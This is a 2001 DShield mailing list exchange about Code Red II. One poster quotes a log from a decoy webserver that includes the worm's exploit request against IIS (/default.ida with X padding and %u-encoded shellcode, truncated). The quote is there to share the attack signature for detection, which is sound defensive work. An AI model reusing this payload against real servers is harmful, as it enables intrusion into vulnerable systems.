[Dshield] Strange Worm !

scott@advancedtool.com scott at advancedtool.com
Wed Aug 8 14:07:00 GMT 2001


Ok, I don't mean for this to be a flame, but a real live observation.

Anyone participating in this list in the last say 24-72 hours should 
be intimiately familiar with the signature of the Code Red II worm 
contact.

Am I totally offbase here?

--Scott

On 8 Aug 2001, at 6:50, johnr wrote:

> hi everyone,
> 
> i'm running websnarf, a fake webserver to get the ip's of the worm-
> infected systems .. strange but the last one was just trying to attack
> me 4 times (!) now ... here's my log :
> 
> $ websnarf v1.04 listening on port 80 (timeout=1 secs)
> 195.178.171.84 - - [08/Aug/2001:04:45:29 -0000] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XX XXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XX XXXXXXXXXXXXXXXXXX%u9090%u68
> 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
> 90 90%u8190%u00c3%u0003%u8b00%u 531b%u53ff%u0078%u0000%u00=a 
*snip*




More information about the list mailing list